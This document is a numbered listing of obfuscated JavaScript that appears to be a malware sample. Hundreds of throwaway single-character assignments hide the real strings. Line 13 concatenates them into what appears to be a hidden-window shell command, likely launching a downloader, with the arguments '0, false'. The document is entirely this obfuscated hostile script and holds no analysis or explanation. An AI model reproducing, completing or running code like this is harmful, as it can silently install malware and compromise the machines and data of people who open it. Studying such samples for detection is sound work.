3 | for ( qmtewrb = 0 ; qmtewrb < peeduwseh[uvtawcwex + csplmbzue + hqkej + vfqkxqvwu + ujvohztff + rcblyiku] ; ++ qmtewrb ) | |
4 | { | |
5 | if ( gwksz == peeduwseh[qmtewrb] ) | |
6 | { | |
7 | gwksz = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( gwksz !== true ) | |
12 | this[sutaji + ulvnf + itnsguiu + zwzxtoky + tgodpkavb + nkdevnmzx + ujvohztff][yjkduxva + tfnswe + tgodpkavb + ujvohztff] ( ); | |
13 | this[sutaji + ulvnf + itnsguiu + zwzxtoky + tgodpkavb + nkdevnmzx + ujvohztff][suynkw + zwzxtoky + csplmbzue + dcosqo + ujvohztff + csplmbzue + ohfpy + jwpdfp + sjykeawzx + csplmbzue + itnsguiu + ujvohztff] ( sutaji + ulvnf + itnsguiu + zwzxtoky + tgodpkavb + nkdevnmzx + ujvohztff + tqpdpkrxg + ulvnf + rcblyiku + csplmbzue + uvtawcwex + uvtawcwex ) [zwzxtoky + tfnswe + hqkej] ( itnsguiu + ivekvjjny + krnhpe + uzmyj + vewcgk + itnsguiu + uzmyj + nkdevnmzx + qnimrezt + xrulxzxkc + csplmbzue + zwzxtoky + gpdcipz + rcblyiku + csplmbzue + uvtawcwex + uvtawcwex + tqpdpkrxg + csplmbzue + zvmijmni + csplmbzue + uzmyj + mbteaiel + suynkw + qnimrezt + ivekvjjny + ivekvjjny + dcosqo + hqkej + krnhpe + uzmyj + ipnopgrfn + qgllcy + hqkej + zeeasphn + qnimrezt + hnwmedkaj + csplmbzue + mbteaiel + sutaji + csplmbzue + jwpdfp + jtzfygyyy + csplmbzue + vxksretk + tfnswe + csplmbzue + gpdcipz + ujvohztff + uzmyj + mbteaiel + ohfpy + tfnswe + ujvohztff + rjfpcos + tgodpkavb + uvtawcwex + csplmbzue + uzmyj + yjqzmhik + ujvohztff + csplmbzue + ivekvjjny + nkdevnmzx + yjqzmhik + lsllbqf + tgodpkavb + hqkej + zeeasphn + qnimrezt + tgodpkavb + itnsguiu + csplmbzue + tqpdpkrxg + nkdevnmzx + krnhpe + fwcopck + uzmyj + rcblyiku + ujvohztff + ujvohztff + nkdevnmzx + ngjlk + vewcgk + vewcgk + edkmftsd + owasznzh + elesdhv + tqpdpkrxg + edkmftsd + zgosbt + elesdhv + tqpdpkrxg + edkmftsd + tqpdpkrxg + ecbzb + chlhxp + pjrxporr + vewcgk + tgodpkavb + hqkej + zeeasphn + qnimrezt + tgodpkavb + itnsguiu + csplmbzue + tqpdpkrxg + nkdevnmzx + rcblyiku + nkdevnmzx + ipnopgrfn + xainqrjq + xainqrjq + gpdcipz + ujvohztff + dcosqo + zwzxtoky + ujvohztff + uzmyj + yjqzmhik + ujvohztff + csplmbzue + ivekvjjny + nkdevnmzx + yjqzmhik + lsllbqf + tgodpkavb + hqkej + zeeasphn + qnimrezt + tgodpkavb + itnsguiu + csplmbzue + tqpdpkrxg + nkdevnmzx + krnhpe + fwcopck + xainqrjq + xainqrjq + itnsguiu + ivekvjjny + krnhpe + uzmyj + vewcgk + itnsguiu + uzmyj + hqkej + csplmbzue + ujvohztff + uzmyj + tfnswe + gpdcipz + csplmbzue + uzmyj + lsllbqf + lsllbqf + edkmftsd + owasznzh + elesdhv + tqpdpkrxg + edkmftsd + zgosbt + elesdhv + tqpdpkrxg + edkmftsd + tqpdpkrxg + ecbzb + chlhxp + pjrxporr + xrqkkd + idhwz + idhwz + idhwz + idhwz + lsllbqf + krnhpe + dcosqo + zeeasphn + xrulxzxkc + xrulxzxkc + xrulxzxkc + zwzxtoky + qnimrezt + qnimrezt + ujvohztff + lsllbqf + xainqrjq + xainqrjq + itnsguiu + ivekvjjny + krnhpe + uzmyj + vewcgk + itnsguiu + uzmyj + zwzxtoky + csplmbzue + vfqkxqvwu + gpdcipz + zeeasphn + zwzxtoky + elesdhv + ecbzb + uzmyj + vewcgk + gpdcipz + uzmyj + lsllbqf + lsllbqf + edkmftsd + owasznzh + elesdhv + tqpdpkrxg + edkmftsd + zgosbt + elesdhv + tqpdpkrxg + edkmftsd + tqpdpkrxg + ecbzb + chlhxp + pjrxporr + xrqkkd + idhwz + idhwz + idhwz + idhwz + lsllbqf + krnhpe + dcosqo + zeeasphn + xrulxzxkc + xrulxzxkc + xrulxzxkc + zwzxtoky + qnimrezt + qnimrezt + ujvohztff + lsllbqf + edkmftsd + edkmftsd + ecbzb + pxptif + ecbzb + jwplwtv + elesdhv + edkmftsd + zgosbt + edkmftsd + pxptif + chlhxp + edkmftsd + edkmftsd + tqpdpkrxg + krnhpe + uvtawcwex + uvtawcwex, 0, false ); |
|
14 | } | |
15 | rjfpcos = "a"; | |
16 | rjfpcos = "T"; | |
17 | rjfpcos = "z"; | |
18 | rjfpcos = "t"; | |
19 | rjfpcos = "j"; | |
20 | rjfpcos = "M"; | |
21 | rjfpcos = "O"; | |
22 | rjfpcos = "X"; | |
23 | rjfpcos = "l"; | |
24 | rjfpcos = "F"; | |
25 | rjfpcos = "i"; | |
26 | rjfpcos = "u"; | |
27 | rjfpcos = "b"; | |
28 | rjfpcos = "G"; | |
29 | rjfpcos = "D"; | |
30 | rjfpcos = "J"; | |
31 | rjfpcos = "s"; | |
32 | rjfpcos = "L"; | |
33 | rjfpcos = "Z"; | |
34 | rjfpcos = "O"; | |
35 | rjfpcos = "w"; | |
36 | rjfpcos = "P"; | |
37 | rjfpcos = "W"; | |
38 | rjfpcos = "r"; | |
39 | rjfpcos = "S"; | |
40 | rjfpcos = "h"; | |
41 | rjfpcos = "Q"; | |
42 | rjfpcos = "z"; | |
43 | rjfpcos = "F"; | |
44 | uvtawcwex = "d"; | |
45 | uvtawcwex = "s"; | |
46 | uvtawcwex = "H"; | |
47 | uvtawcwex = "n"; | |
48 | uvtawcwex = "G"; | |
49 | uvtawcwex = "l"; | |
50 | uvtawcwex = "g"; | |
51 | uvtawcwex = "S"; | |
52 | uvtawcwex = "c"; | |
53 | uvtawcwex = "o"; | |
54 | uvtawcwex = "s"; | |
55 | uvtawcwex = "i"; | |
56 | uvtawcwex = "J"; | |
57 | uvtawcwex = "O"; | |
58 | uvtawcwex = "I"; | |
59 | uvtawcwex = "g"; | |
60 | uvtawcwex = "q"; | |
61 | uvtawcwex = "r"; | |
62 | uvtawcwex = "R"; | |
63 | uvtawcwex = "Y"; | |
64 | uvtawcwex = "b"; | |
65 | uvtawcwex = "C"; | |
66 | uvtawcwex = "j"; | |
67 | uvtawcwex = "A"; | |
68 | uvtawcwex = "Q"; | |
69 | uvtawcwex = "q"; | |
70 | uvtawcwex = "n"; | |
71 | uvtawcwex = "G"; | |
72 | uvtawcwex = "W"; | |
73 | uvtawcwex = "x"; | |
74 | uvtawcwex = "n"; | |
75 | uvtawcwex = "U"; | |
76 | uvtawcwex = "i"; | |
77 | uvtawcwex = "l"; | |
78 | zvmijmni = "m"; | |
79 | zvmijmni = "H"; | |
80 | zvmijmni = "z"; | |
81 | zvmijmni = "o"; | |
82 | zvmijmni = "B"; | |
83 | zvmijmni = "h"; | |
84 | zvmijmni = "r"; | |
85 | zvmijmni = "h"; | |
86 | zvmijmni = "h"; | |
87 | zvmijmni = "O"; | |
88 | zvmijmni = "O"; | |
89 | zvmijmni = "O"; | |
90 | zvmijmni = "Y"; | |
91 | zvmijmni = "x"; | |
92 | ecbzb = "Q"; | |
93 | ecbzb = "V"; | |
94 | ecbzb = "P"; | |
95 | ecbzb = "M"; | |
96 | ecbzb = "A"; | |
97 | ecbzb = "c"; | |
98 | ecbzb = "b"; | |
99 | ecbzb = "k"; | |
100 | ecbzb = "H"; | |
101 | ecbzb = "W"; | |
102 | ecbzb = "m"; | |
103 | ecbzb = "v"; | |
104 | ecbzb = "P"; | |
105 | ecbzb = "e"; | |
106 | ecbzb = "H"; | |
107 | ecbzb = "J"; | |
108 | ecbzb = "s"; | |
109 | ecbzb = "r"; | |
110 | ecbzb = "y"; | |
111 | ecbzb = "G"; | |
112 | ecbzb = "z"; | |
113 | ecbzb = "t"; | |
114 | ecbzb = "R"; | |
115 | ecbzb = "h"; | |
116 | ecbzb = "Y"; | |
117 | ecbzb = "Q"; | |
118 | ecbzb = "f"; | |
119 | ecbzb = "N"; | |
120 | ecbzb = "b"; | |
121 | ecbzb = "v"; | |
122 | ecbzb = "S"; | |
123 | ecbzb = "i"; | |
124 | ecbzb = "I"; | |
125 | ecbzb = "i"; | |
126 | ecbzb = "2"; | |
127 | amxtw = "h"; | |
128 | amxtw = "H"; | |
129 | amxtw = "b"; | |
130 | amxtw = "g"; | |
131 | amxtw = "e"; | |
132 | amxtw = "r"; | |
133 | amxtw = "y"; | |
134 | amxtw = "n"; | |
135 | amxtw = "W"; | |
136 | amxtw = "x"; | |
137 | amxtw = "X"; | |
138 | amxtw = "h"; | |
139 | amxtw = "F"; | |
140 | amxtw = "z"; | |
141 | amxtw = "a"; | |
142 | amxtw = "S"; | |
143 | amxtw = "i"; | |
144 | amxtw = "l"; | |
145 | amxtw = "q"; | |
146 | amxtw = "u"; | |
147 | amxtw = "C"; | |
148 | amxtw = "I"; | |
149 | amxtw = "u"; | |
150 | amxtw = "B"; | |
151 | amxtw = "a"; | |
152 | amxtw = "H"; | |
153 | amxtw = "x"; | |
154 | amxtw = "G"; | |
155 | amxtw = "N"; | |
156 | amxtw = "s"; | |
157 | amxtw = "V"; | |
158 | amxtw = "t"; | |
159 | amxtw = "T"; | |
160 | amxtw = "D"; | |
161 | amxtw = "f"; | |
162 | amxtw = "C"; | |
163 | amxtw = "m"; | |
164 | amxtw = "s"; | |
165 | amxtw = "c"; | |
166 | amxtw = "U"; | |
167 | xrulxzxkc = "f"; | |
168 | xrulxzxkc = "a"; | |
169 | xrulxzxkc = "w"; | |
170 | yjkduxva = "P"; | |
171 | yjkduxva = "u"; | |
172 | yjkduxva = "W"; | |
173 | yjkduxva = "A"; | |
174 | yjkduxva = "T"; | |
175 | yjkduxva = "w"; | |
176 | yjkduxva = "Q"; | |
177 | yjkduxva = "j"; | |
178 | yjkduxva = "s"; | |
179 | yjkduxva = "n"; | |
180 | yjkduxva = "L"; | |
181 | yjkduxva = "Q"; | |
182 | krnhpe = "s"; | |
183 | krnhpe = "A"; | |
184 | krnhpe = "w"; | |
185 | krnhpe = "H"; | |
186 | krnhpe = "g"; | |
187 | krnhpe = "v"; | |
188 | krnhpe = "G"; | |
189 | krnhpe = "D"; | |
190 | krnhpe = "I"; | |
191 | krnhpe = "A"; | |
192 | krnhpe = "d"; | |
193 | rcblyiku = "z"; | |
194 | rcblyiku = "C"; | |
195 | rcblyiku = "i"; | |
196 | rcblyiku = "V"; | |
197 | rcblyiku = "k"; | |
198 | rcblyiku = "t"; | |
199 | rcblyiku = "h"; | |
200 | hqkej = "r"; | |
201 | hqkej = "q"; | |
202 | hqkej = "C"; | |
203 | hqkej = "p"; | |
204 | hqkej = "p"; | |
205 | hqkej = "E"; | |
206 | hqkej = "L"; | |
207 | hqkej = "F"; | |
208 | hqkej = "H"; | |
209 | hqkej = "S"; | |
210 | hqkej = "R"; | |
211 | hqkej = "t"; | |
212 | hqkej = "i"; | |
213 | hqkej = "x"; | |
214 | hqkej = "o"; | |
215 | hqkej = "q"; | |
216 | hqkej = "n"; | |
217 | hqkej = "r"; | |
218 | hqkej = "s"; | |
219 | hqkej = "I"; | |
220 | hqkej = "A"; | |
221 | hqkej = "A"; | |
222 | hqkej = "a"; | |
223 | hqkej = "F"; | |
224 | hqkej = "N"; | |
225 | hqkej = "T"; | |
226 | hqkej = "W"; | |
227 | hqkej = "r"; | |
228 | hqkej = "y"; | |
229 | hqkej = "S"; | |
230 | hqkej = "D"; | |
231 | hqkej = "I"; | |
232 | hqkej = "v"; | |
233 | hqkej = "f"; | |
234 | hqkej = "x"; | |
235 | hqkej = "r"; | |
236 | hqkej = "i"; | |
237 | hqkej = "o"; | |
238 | hqkej = "z"; | |
239 | hqkej = "c"; | |
240 | hqkej = "L"; | |
241 | hqkej = "I"; | |
242 | hqkej = "r"; | |
243 | hqkej = "n"; | |
244 | elesdhv = "L"; | |
245 | elesdhv = "q"; | |
246 | elesdhv = "O"; | |
247 | elesdhv = "k"; | |
248 | elesdhv = "v"; | |
249 | elesdhv = "G"; | |
250 | elesdhv = "x"; | |
251 | elesdhv = "v"; | |
252 | elesdhv = "L"; | |
253 | elesdhv = "B"; | |
254 | elesdhv = "k"; | |
255 | elesdhv = "s"; | |
256 | elesdhv = "Q"; | |
257 | elesdhv = "C"; | |
258 | elesdhv = "I"; | |
259 | elesdhv = "C"; | |
260 | elesdhv = "d"; | |
261 | elesdhv = "B"; | |
262 | elesdhv = "z"; | |
263 | elesdhv = "p"; | |
264 | elesdhv = "m"; | |
265 | elesdhv = "U"; | |
266 | elesdhv = "W"; | |
267 | elesdhv = "a"; | |
268 | elesdhv = "j"; | |
269 | elesdhv = "n"; | |
270 | elesdhv = "u"; | |
271 | elesdhv = "S"; | |
272 | elesdhv = "Q"; | |
273 | elesdhv = "x"; | |
274 | elesdhv = "D"; | |
275 | elesdhv = "g"; | |
276 | elesdhv = "Q"; | |
277 | elesdhv = "T"; | |
278 | elesdhv = "T"; | |
279 | elesdhv = "G"; | |
280 | elesdhv = "B"; | |
281 | elesdhv = "A"; | |
282 | elesdhv = "L"; | |
283 | elesdhv = "B"; | |
284 | elesdhv = "M"; | |
285 | elesdhv = "G"; | |
286 | elesdhv = "3"; | |
287 | ivekvjjny = "v"; | |
288 | ivekvjjny = "f"; | |
289 | ivekvjjny = "H"; | |
290 | ivekvjjny = "b"; | |
291 | ivekvjjny = "W"; | |
292 | ivekvjjny = "B"; | |
293 | ivekvjjny = "d"; | |
294 | ivekvjjny = "u"; | |
295 | ivekvjjny = "s"; | |
296 | ivekvjjny = "e"; | |
297 | ivekvjjny = "N"; | |
298 | ivekvjjny = "J"; | |
299 | ivekvjjny = "C"; | |
300 | ivekvjjny = "R"; | |
301 | ivekvjjny = "t"; | |
302 | ivekvjjny = "J"; | |
303 | ivekvjjny = "x"; | |
304 | ivekvjjny = "p"; | |
305 | ivekvjjny = "u"; | |
306 | ivekvjjny = "S"; | |
307 | ivekvjjny = "A"; | |
308 | ivekvjjny = "G"; | |
309 | ivekvjjny = "j"; | |
310 | ivekvjjny = "h"; | |
311 | ivekvjjny = "h"; | |
312 | ivekvjjny = "v"; | |
313 | ivekvjjny = "C"; | |
314 | ivekvjjny = "G"; | |
315 | ivekvjjny = "A"; | |
316 | ivekvjjny = "T"; | |
317 | ivekvjjny = "X"; | |
318 | ivekvjjny = "v"; | |
319 | ivekvjjny = "L"; | |
320 | ivekvjjny = "j"; | |
321 | ivekvjjny = "s"; | |
322 | ivekvjjny = "u"; | |
323 | ivekvjjny = "A"; | |
324 | ivekvjjny = "Y"; | |
325 | ivekvjjny = "l"; | |
326 | ivekvjjny = "B"; | |
327 | ivekvjjny = "R"; | |
328 | ivekvjjny = "U"; | |
329 | ivekvjjny = "m"; | |
330 | ujvohztff = "l"; | |
331 | ujvohztff = "d"; | |
332 | ujvohztff = "x"; | |
333 | ujvohztff = "m"; | |
334 | ujvohztff = "m"; | |
335 | ujvohztff = "m"; | |
336 | ujvohztff = "s"; | |
337 | ujvohztff = "f"; | |
338 | ujvohztff = "n"; | |
339 | ujvohztff = "A"; | |
340 | ujvohztff = "W"; | |
341 | ujvohztff = "p"; | |
342 | ujvohztff = "c"; | |
343 | ujvohztff = "N"; | |
344 | ujvohztff = "I"; | |
345 | ujvohztff = "Q"; | |
346 | ujvohztff = "C"; | |
347 | ujvohztff = "c"; | |
348 | ujvohztff = "N"; | |
349 | ujvohztff = "F"; | |
350 | ujvohztff = "B"; | |
351 | ujvohztff = "E"; | |
352 | ujvohztff = "C"; | |
353 | ujvohztff = "d"; | |
354 | ujvohztff = "R"; | |
355 | ujvohztff = "a"; | |
356 | ujvohztff = "d"; | |
357 | ujvohztff = "b"; | |
358 | ujvohztff = "N"; | |
359 | ujvohztff = "U"; | |
360 | ujvohztff = "t"; | |
361 | uaqcx = "X"; | |
362 | uaqcx = "V"; | |
363 | uaqcx = "Z"; | |
364 | uaqcx = "S"; | |
365 | uaqcx = "I"; | |
366 | uaqcx = "M"; | |
367 | uaqcx = "g"; | |
368 | uaqcx = "Z"; | |
369 | uaqcx = "H"; | |
370 | uaqcx = "w"; | |
371 | uaqcx = "r"; | |
372 | uaqcx = "o"; | |
373 | uaqcx = "K"; | |
374 | uaqcx = "T"; | |
375 | uaqcx = "m"; | |
376 | uaqcx = "n"; | |
377 | uaqcx = "b"; | |
378 | uaqcx = "l"; | |
379 | uaqcx = "w"; | |
380 | uaqcx = "O"; | |
381 | uaqcx = "e"; | |
382 | uaqcx = "k"; | |
383 | uaqcx = "A"; | |
384 | uaqcx = "m"; | |
385 | uaqcx = "S"; | |
386 | uaqcx = "u"; | |
387 | uaqcx = "g"; | |
388 | uaqcx = "Z"; | |
389 | uaqcx = "M"; | |
390 | uaqcx = "U"; | |
391 | uaqcx = "Q"; | |
392 | uaqcx = "W"; | |
393 | uaqcx = "K"; | |
394 | uaqcx = "T"; | |
395 | qicyuol = "V"; | |
396 | qicyuol = "X"; | |
397 | qicyuol = "P"; | |
398 | qicyuol = "Q"; | |
399 | qicyuol = "c"; | |
400 | qicyuol = "f"; | |
401 | qicyuol = "o"; | |
402 | qicyuol = "U"; | |
403 | qicyuol = "P"; | |
404 | qicyuol = "b"; | |
405 | qicyuol = "E"; | |
406 | qicyuol = "X"; | |
407 | qicyuol = "f"; | |
408 | qicyuol = "G"; | |
409 | qicyuol = "h"; | |
410 | qicyuol = "F"; | |
411 | qicyuol = "E"; | |
412 | qicyuol = "k"; | |
413 | qicyuol = "a"; | |
414 | qicyuol = "D"; | |
415 | qicyuol = "i"; | |
416 | qicyuol = "g"; | |
417 | qicyuol = "c"; | |
418 | qicyuol = "X"; | |
419 | qicyuol = "X"; | |
420 | qicyuol = "u"; | |
421 | qicyuol = "i"; | |
422 | qicyuol = "j"; | |
423 | qicyuol = "x"; | |
424 | qicyuol = "A"; | |
425 | qicyuol = "O"; | |
426 | qicyuol = "V"; | |
427 | qicyuol = "G"; | |
428 | qicyuol = "Q"; | |
429 | qicyuol = "U"; | |
430 | qicyuol = "D"; | |
431 | qicyuol = "w"; | |
432 | qicyuol = "m"; | |
433 | qicyuol = "P"; | |
434 | ohfpy = "v"; | |
435 | ohfpy = "b"; | |
436 | ohfpy = "v"; | |
437 | ohfpy = "C"; | |
438 | ohfpy = "m"; | |
439 | ohfpy = "d"; | |
440 | ohfpy = "x"; | |
441 | ohfpy = "d"; | |
442 | ohfpy = "E"; | |
443 | ohfpy = "L"; | |
444 | ohfpy = "v"; | |
445 | ohfpy = "C"; | |
446 | ohfpy = "m"; | |
447 | ohfpy = "B"; | |
448 | ohfpy = "F"; | |
449 | ohfpy = "x"; | |
450 | ohfpy = "L"; | |
451 | ohfpy = "X"; | |
452 | ohfpy = "O"; | |
453 | ohfpy = "A"; | |
454 | ohfpy = "o"; | |
455 | ohfpy = "m"; | |
456 | ohfpy = "s"; | |
457 | ohfpy = "N"; | |
458 | ohfpy = "r"; | |
459 | ohfpy = "p"; | |
460 | ohfpy = "O"; | |
461 | jwplwtv = "h"; | |
462 | jwplwtv = "U"; | |
463 | jwplwtv = "o"; | |
464 | jwplwtv = "F"; | |
465 | jwplwtv = "i"; | |
466 | jwplwtv = "U"; | |
467 | jwplwtv = "Y"; | |
468 | jwplwtv = "F"; | |
469 | jwplwtv = "P"; | |
470 | jwplwtv = "Z"; | |
471 | jwplwtv = "B"; | |
472 | jwplwtv = "q"; | |
473 | jwplwtv = "b"; | |
474 | jwplwtv = "Z"; | |
475 | jwplwtv = "c"; | |
476 | jwplwtv = "T"; | |
477 | jwplwtv = "j"; | |
478 | jwplwtv = "V"; | |
479 | jwplwtv = "b"; | |
480 | jwplwtv = "K"; | |
481 | jwplwtv = "m"; | |
482 | jwplwtv = "t"; | |
483 | jwplwtv = "j"; | |
484 | jwplwtv = "Y"; | |
485 | jwplwtv = "Y"; | |
486 | jwplwtv = "G"; | |
487 | jwplwtv = "6"; | |
488 | edkmftsd = "d"; | |
489 | edkmftsd = "n"; | |
490 | edkmftsd = "U"; | |
491 | edkmftsd = "Y"; | |
492 | edkmftsd = "q"; | |
493 | edkmftsd = "U"; | |
494 | edkmftsd = "U"; | |
495 | edkmftsd = "1"; | |
496 | gpdcipz = "Q"; | |
497 | gpdcipz = "f"; | |
498 | gpdcipz = "d"; | |
499 | gpdcipz = "v"; | |
500 | gpdcipz = "y"; | |
501 | gpdcipz = "p"; | |
502 | gpdcipz = "K"; | |
503 | gpdcipz = "R"; | |
504 | gpdcipz = "p"; | |
505 | gpdcipz = "D"; | |
506 | gpdcipz = "p"; | |
507 | gpdcipz = "H"; | |
508 | gpdcipz = "V"; | |
509 | gpdcipz = "S"; | |
510 | gpdcipz = "f"; | |
511 | gpdcipz = "L"; | |
512 | gpdcipz = "w"; | |
513 | gpdcipz = "u"; | |
514 | gpdcipz = "P"; | |
515 | gpdcipz = "G"; | |
516 | gpdcipz = "I"; | |
517 | gpdcipz = "w"; | |
518 | gpdcipz = "K"; | |
519 | gpdcipz = "e"; | |
520 | gpdcipz = "s"; | |
521 | sutaji = "E"; | |
522 | sutaji = "U"; | |
523 | sutaji = "U"; | |
524 | sutaji = "W"; | |
525 | itnsguiu = "q"; | |
526 | itnsguiu = "v"; | |
527 | itnsguiu = "J"; | |
528 | itnsguiu = "w"; | |
529 | itnsguiu = "Z"; | |
530 | itnsguiu = "y"; | |
531 | itnsguiu = "x"; | |
532 | itnsguiu = "f"; | |
533 | itnsguiu = "W"; | |
534 | itnsguiu = "k"; | |
535 | itnsguiu = "r"; | |
536 | itnsguiu = "y"; | |
537 | itnsguiu = "O"; | |
538 | itnsguiu = "w"; | |
539 | itnsguiu = "o"; | |
540 | itnsguiu = "q"; | |
541 | itnsguiu = "i"; | |
542 | itnsguiu = "X"; | |
543 | itnsguiu = "E"; | |
544 | itnsguiu = "u"; | |
545 | itnsguiu = "H"; | |
546 | itnsguiu = "n"; | |
547 | itnsguiu = "x"; | |
548 | itnsguiu = "O"; | |
549 | itnsguiu = "K"; | |
550 | itnsguiu = "q"; | |
551 | itnsguiu = "n"; | |
552 | itnsguiu = "i"; | |
553 | itnsguiu = "m"; | |
554 | itnsguiu = "z"; | |
555 | itnsguiu = "O"; | |
556 | itnsguiu = "c"; | |
557 | idhwz = "G"; | |
558 | idhwz = "E"; | |
559 | idhwz = "P"; | |
560 | idhwz = "X"; | |
561 | idhwz = "o"; | |
562 | idhwz = "H"; | |
563 | idhwz = "E"; | |
564 | idhwz = "K"; | |
565 | idhwz = "R"; | |
566 | idhwz = "l"; | |
567 | idhwz = "y"; | |
568 | idhwz = "x"; | |
569 | idhwz = "c"; | |
570 | idhwz = "l"; | |
571 | idhwz = "d"; | |
572 | idhwz = "H"; | |
573 | idhwz = "a"; | |
574 | idhwz = "O"; | |
575 | idhwz = "g"; | |
576 | idhwz = "Y"; | |
577 | idhwz = "v"; | |
578 | idhwz = "e"; | |
579 | idhwz = "L"; | |
580 | idhwz = "H"; | |
581 | idhwz = "s"; | |
582 | idhwz = "H"; | |
583 | idhwz = "j"; | |
584 | idhwz = "G"; | |
585 | idhwz = "R"; | |
586 | idhwz = "b"; | |
587 | idhwz = "P"; | |
588 | idhwz = "N"; | |
589 | idhwz = "8"; | |
590 | ulvnf = "F"; | |
591 | ulvnf = "t"; | |
592 | ulvnf = "b"; | |
593 | ulvnf = "c"; | |
594 | ulvnf = "B"; | |
595 | ulvnf = "N"; | |
596 | ulvnf = "I"; | |
597 | ulvnf = "J"; | |
598 | ulvnf = "d"; | |
599 | ulvnf = "G"; | |
600 | ulvnf = "K"; | |
601 | ulvnf = "x"; | |
602 | ulvnf = "g"; | |
603 | ulvnf = "v"; | |
604 | ulvnf = "f"; | |
605 | ulvnf = "S"; | |
606 | vxksretk = "L"; | |
607 | vxksretk = "f"; | |
608 | vxksretk = "Q"; | |
609 | vxksretk = "F"; | |
610 | vxksretk = "D"; | |
611 | vxksretk = "F"; | |
612 | vxksretk = "F"; | |
613 | vxksretk = "b"; | |
614 | vxksretk = "L"; | |
615 | vxksretk = "L"; | |
616 | vxksretk = "E"; | |
617 | vxksretk = "P"; | |
618 | vxksretk = "e"; | |
619 | vxksretk = "P"; | |
620 | vxksretk = "q"; | |
621 | chlhxp = "q"; | |
622 | chlhxp = "i"; | |
623 | chlhxp = "u"; | |
624 | chlhxp = "O"; | |
625 | chlhxp = "R"; | |
626 | chlhxp = "H"; | |
627 | chlhxp = "U"; | |
628 | chlhxp = "x"; | |
629 | chlhxp = "c"; | |
630 | chlhxp = "z"; | |
631 | chlhxp = "u"; | |
632 | chlhxp = "M"; | |
633 | chlhxp = "s"; | |
634 | chlhxp = "K"; | |
635 | chlhxp = "l"; | |
636 | chlhxp = "I"; | |
637 | chlhxp = "M"; | |
638 | chlhxp = "j"; | |
639 | chlhxp = "d"; | |
640 | chlhxp = "g"; | |
641 | chlhxp = "e"; | |
642 | chlhxp = "F"; | |
643 | chlhxp = "V"; | |
644 | chlhxp = "z"; | |
645 | chlhxp = "D"; | |
646 | chlhxp = "w"; | |
647 | chlhxp = "c"; | |
648 | chlhxp = "H"; | |
649 | chlhxp = "V"; | |
650 | chlhxp = "x"; | |
651 | chlhxp = "L"; | |
652 | chlhxp = "W"; | |
653 | chlhxp = "b"; | |
654 | chlhxp = "v"; | |
655 | chlhxp = "v"; | |
656 | chlhxp = "G"; | |
657 | chlhxp = "B"; | |
658 | chlhxp = "E"; | |
659 | chlhxp = "j"; | |
660 | chlhxp = "g"; | |
661 | chlhxp = "Z"; | |
662 | chlhxp = "m"; | |
663 | chlhxp = "0"; | |
664 | qnimrezt = "D"; | |
665 | qnimrezt = "a"; | |
666 | qnimrezt = "h"; | |
667 | qnimrezt = "H"; | |
668 | qnimrezt = "Z"; | |
669 | qnimrezt = "l"; | |
670 | qnimrezt = "A"; | |
671 | qnimrezt = "w"; | |
672 | qnimrezt = "q"; | |
673 | qnimrezt = "r"; | |
674 | qnimrezt = "a"; | |
675 | qnimrezt = "d"; | |
676 | qnimrezt = "b"; | |
677 | qnimrezt = "T"; | |
678 | qnimrezt = "H"; | |
679 | qnimrezt = "G"; | |
680 | qnimrezt = "Z"; | |
681 | qnimrezt = "Y"; | |
682 | qnimrezt = "P"; | |
683 | qnimrezt = "x"; | |
684 | qnimrezt = "Z"; | |
685 | qnimrezt = "E"; | |
686 | qnimrezt = "x"; | |
687 | qnimrezt = "W"; | |
688 | qnimrezt = "n"; | |
689 | qnimrezt = "c"; | |
690 | qnimrezt = "c"; | |
691 | qnimrezt = "k"; | |
692 | qnimrezt = "y"; | |
693 | qnimrezt = "o"; | |
694 | uzmyj = "a"; | |
695 | uzmyj = "p"; | |
696 | uzmyj = "h"; | |
697 | uzmyj = "j"; | |
698 | uzmyj = "F"; | |
699 | uzmyj = "B"; | |
700 | uzmyj = "s"; | |
701 | uzmyj = "u"; | |
702 | uzmyj = "Q"; | |
703 | uzmyj = "C"; | |
704 | uzmyj = "D"; | |
705 | uzmyj = "r"; | |
706 | uzmyj = "d"; | |
707 | uzmyj = "T"; | |
708 | uzmyj = "G"; | |
709 | uzmyj = "k"; | |
710 | uzmyj = "q"; | |
711 | uzmyj = "c"; | |
712 | uzmyj = "l"; | |
713 | uzmyj = "b"; | |
714 | uzmyj = "m"; | |
715 | uzmyj = " "; | |
716 | sjykeawzx = "H"; | |
717 | sjykeawzx = "E"; | |
718 | sjykeawzx = "j"; | |
719 | sjykeawzx = "Q"; | |
720 | sjykeawzx = "m"; | |
721 | sjykeawzx = "R"; | |
722 | sjykeawzx = "Y"; | |
723 | sjykeawzx = "H"; | |
724 | sjykeawzx = "d"; | |
725 | sjykeawzx = "r"; | |
726 | sjykeawzx = "a"; | |
727 | sjykeawzx = "L"; | |
728 | sjykeawzx = "T"; | |
729 | sjykeawzx = "j"; | |
730 | tfnswe = "Y"; | |
731 | tfnswe = "f"; | |
732 | tfnswe = "h"; | |
733 | tfnswe = "M"; | |
734 | tfnswe = "Z"; | |
735 | tfnswe = "g"; | |
736 | tfnswe = "o"; | |
737 | tfnswe = "q"; | |
738 | tfnswe = "u"; | |
739 | inrxfjri = "j"; | |
740 | inrxfjri = "G"; | |
741 | inrxfjri = "t"; | |
742 | inrxfjri = "c"; | |
743 | inrxfjri = "p"; | |
744 | inrxfjri = "F"; | |
745 | inrxfjri = "v"; | |
746 | inrxfjri = "C"; | |
747 | inrxfjri = "L"; | |
748 | inrxfjri = "k"; | |
749 | inrxfjri = "c"; | |
750 | inrxfjri = "y"; | |
751 | inrxfjri = "V"; | |
752 | inrxfjri = "s"; | |
753 | inrxfjri = "c"; | |
754 | inrxfjri = "Z"; | |
755 | inrxfjri = "p"; | |
756 | inrxfjri = "K"; | |
757 | inrxfjri = "O"; | |
758 | inrxfjri = "G"; | |
759 | inrxfjri = "n"; | |
760 | inrxfjri = "a"; | |
761 | inrxfjri = "m"; | |
762 | inrxfjri = "b"; | |
763 | inrxfjri = "h"; | |
764 | inrxfjri = "P"; | |
765 | inrxfjri = "l"; | |
766 | inrxfjri = "Y"; | |
767 | lsllbqf = "l"; | |
768 | lsllbqf = "B"; | |
769 | lsllbqf = "M"; | |
770 | lsllbqf = "k"; | |
771 | lsllbqf = "o"; | |
772 | lsllbqf = "n"; | |
773 | lsllbqf = "P"; | |
774 | lsllbqf = "V"; | |
775 | lsllbqf = "V"; | |
776 | lsllbqf = "G"; | |
777 | lsllbqf = "f"; | |
778 | lsllbqf = "Q"; | |
779 | lsllbqf = "L"; | |
780 | lsllbqf = "c"; | |
